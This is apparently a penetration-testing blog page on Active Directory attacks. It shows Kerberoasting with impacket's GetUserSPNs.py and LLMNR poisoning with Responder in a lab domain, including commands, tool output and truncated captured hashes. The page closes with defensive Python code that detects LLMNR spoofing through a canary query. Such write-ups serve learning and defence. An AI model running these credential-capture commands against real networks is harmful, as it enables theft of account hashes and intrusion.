0xk4k45h1
Copyright © 2024 |
Yankos
Active Directory
Kerberoast
This attack is a form of lateral movement in Active Directory. Once you get any credentials in the domain, do Kerberoasting! But who is the target now? It is done against any service account, exploiting the TGS creation mechanism.

TGS: Ticket Granting Service. This ticket is sent to the user who wants to access a specific service once that user provides their TGT. The TGS is encrypted using the hash of the service account, so you can try cracking it offline to get the password of the service account.

Note: If there is a port number in the SPN, make sure that you remove it from the hash you get.

We use GetUserSPNs.py from impacket. Example usage:

┌──(youssif㉿youssif)-[/usr/share/doc/python3-impacket/examples]
└─$ python ./GetUserSPNs.py -dc-ip 192.168.2.129 rift.local/abdo:abdo123 -request
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
ServicePrincipalName                  Name        MemberOf  PasswordLastSet             LastLogon  Delegation
------------------------------------  ----------  --------  --------------------------  ---------  ----------
NINJA-DC/SQLService.rift.local:60001  SQLService            2024-02-16 10:27:07.970505  <never>

[-] CCache file is not found. Skipping...
$krb5tgs$23$*SQLService$RIFT.LOCAL$rift.local/SQLService*$8953860704b1ee9e903ebfd13994127a$…

Mitigation

Mitigation is simple:
Use strong passwords (hard to crack).
Make sure the service accounts have the least privileges (not an admin, for example).
Active Directory · 2024-06-21
SMB relay
Active Directory · 2024-02-17
LLMNR Poisoning
What is LLMNR

The Link-Local Multicast Name Resolution (LLMNR) is a protocol based on the Domain Name System (DNS) packet format that allows both IPv4 and IPv6 hosts to perform name resolution for hosts on the same local link. The flaw occurs because the user's name and NTLMv2 hash are sent in the victim's reply.

LLMNR Poisoning

When trying to access an SMB share, for example, the computer takes the following steps:
1. Check the local cache for the record; if no record exists,
2. Send a DNS query to the DNS server. The problem occurs here: if the DNS server couldn't find the name,
3. The computer (victim) sends an LLMNR query as a broadcast.
4. The responder (man in the middle) here will get the name and the NTLMv2 hash of the victim when it responds.

As an attacker you can try cracking the NTLMv2 hash using a tool like hashcat.

LLMNR poisoning is an attack where a malicious actor listens for LLMNR requests and responds with their own IP address (or another IP of their choosing) to redirect the traffic. In our discussion we will use a tool called Responder to perform the role of the MITM, which will get the name & hash and respond to the victim.

┌──(youssif㉿youssif)-[~]
└─$ sudo responder -I eth0
[sudo] password for youssif:
sudo: a password is required

┌──(youssif㉿youssif)-[~]
└─$ sudo responder -I eth0
[sudo] password for youssif:

NBT-NS, LLMNR & MDNS Responder 3.1.3.0

To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal  -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.126.135]
    Responder IPv6             [fe80::9857:69cd:4087:1b54]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-NSDPQOYEW3Q]
    Responder Domain Name      [HK3L.LOCAL]
    Responder DCE-RPC Port     [49090]

[+] Listening for events...

Now Responder is set. Let's go to the victim and try accessing the Responder IP from the victim machine, as shown below. When we look again at Responder we will find this:

[SMB] NTLMv2-SSP Client   : 192.168.126.151
[SMB] NTLMv2-SSP Username : RIFT\jax
[SMB] NTLMv2-SSP Hash     : jax::RIFT:98bf26eff5a881f…

As an attacker, you got the NTLMv2 hash and you can try cracking it. You can also use the hash without cracking it in other attacks.
Active Directory · 2024-02-17
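The poisoning flow above (DNS miss, then an LLMNR query that anyone on the link can answer) also gives a defender a cheap check: query LLMNR for a name that does not exist and treat any answer as a spoofed one. The following is an added example, not code from the original post or from Responder: it encodes such a canary query and parses a reply in LLMNR's DNS wire format. The canary name, the transaction id and the sample reply bytes are constructed here; the reply uses the Responder IP from the transcript above as the spoofed answer.

```python
import struct
import ipaddress
def build_query(name, ident=0x1234):  # LLMNR query for an A record, in DNS wire format
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!6H", ident, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _read_name(buf, off):
    """Decode a DNS-style name at off (labels or a compression pointer); return (name, next_off)."""
    labels = []
    while True:
        length = buf[off]
        if length == 0:
            return ".".join(labels), off + 1
        if length & 0xC0 == 0xC0:  # compression pointer to a name earlier in the packet
            ptr = struct.unpack_from("!H", buf, off)[0] & 0x3FFF
            tail, _ = _read_name(buf, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(buf[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length

def parse_answers(buf):
    """Return (id, is_response, [(name, ipv4)]) for the A answers in an LLMNR datagram."""
    ident, flags, qd, an = struct.unpack_from("!4H", buf, 0)
    off = 12
    for _ in range(qd):
        off = _read_name(buf, off)[1] + 4  # skip the name, QTYPE and QCLASS
    answers = []
    for _ in range(an):
        name, off = _read_name(buf, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", buf, off)
        rdata, off = buf[off + 10:off + 10 + rdlen], off + 10 + rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, str(ipaddress.IPv4Address(rdata))))
    return ident, bool(flags & 0x8000), answers

def canary_hit(query, response, src_ip):
    """The canary name does not exist, so any answer matching the query id is a spoofed one."""
    canary_id, _, _ = parse_answers(query)
    ident, is_resp, answers = parse_answers(response)
    if not is_resp or ident != canary_id:
        return None
    return [f"{src_ip} answered canary {n} with {ip}" for n, ip in answers] or None

# Constructed sample: a poisoner's reply to the canary; 192.168.126.135 is the Responder IP above
CANARY = "zz-canary-7f3a"
QUERY = build_query(CANARY)
SPOOFED = (struct.pack("!6H", 0x1234, 0x8000, 1, 1, 0, 0) + QUERY[12:]  # header, echoed question
           + struct.pack("!HHHIH", 0xC00C, 1, 1, 30, 4)  # name pointer to offset 12, A, IN, TTL, rdlen
           + ipaddress.IPv4Address("192.168.126.135").packed)
```

On a live network the QUERY bytes would be sent to the LLMNR multicast group (224.0.0.252, UDP 5355) and each reply passed to canary_hit together with its source address.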